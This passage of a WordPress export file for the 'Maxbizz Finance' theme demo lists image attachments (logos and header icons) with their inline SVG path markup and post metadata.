		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[strategy]]></wp:term_name>
	</wp:term>
			<wp:term><wp:term_id>21</wp:term_id><wp:term_taxonomy>nav_menu</wp:term_taxonomy><wp:term_slug><![CDATA[main-menu]]></wp:term_slug><wp:term_name><![CDATA[Main Menu]]></wp:term_name>
</wp:term>

	<generator>https://wordpress.org/?v=5.6</generator>

<image>
	<url>https://maxbizz.s3.amazonaws.com/images/favicon-aqua.png</url>
	<title>Maxbizz Finance</title>
	<link>http://wpdemo.archiwp.com/maxbizz-finance</link>
	<width>32</width>
	<height>32</height>
</image> 

		<item>
		<title>01_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-1/01_black/</link>
		<pubDate>Thu, 03 Sep 2020 09:10:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>334</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:10:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:10:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/01_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="0" style="stop-color:#FFD797"></stop>
	<stop offset="1" style="stop-color:#FF8523"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>call</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-1/call/</link>
		<pubDate>Thu, 03 Sep 2020 09:13:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/call.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>345</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:13:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:13:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[call]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/call.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/call.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pin</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-1/pin/</link>
		<pubDate>Thu, 03 Sep 2020 09:14:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pin.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>347</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:14:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:14:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pin]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pin.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/pin.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>symbol</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-2/symbol/</link>
		<pubDate>Thu, 03 Sep 2020 09:34:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/symbol.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>356</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:34:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:34:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[symbol]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>106</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/symbol.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/symbol.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>send</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/side-panel/send/</link>
		<pubDate>Thu, 03 Sep 2020 10:08:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/send.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>374</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:08:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:08:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[send]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>253</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/send.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/04/send.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-3/03_white/</link>
		<pubDate>Thu, 03 Sep 2020 10:09:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>377</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:09:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:09:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>182</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/03_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#FFFFFF;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="2.012780e-07" style="stop-color:#F45555"></stop>
	<stop offset="1" style="stop-color:#D92300"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
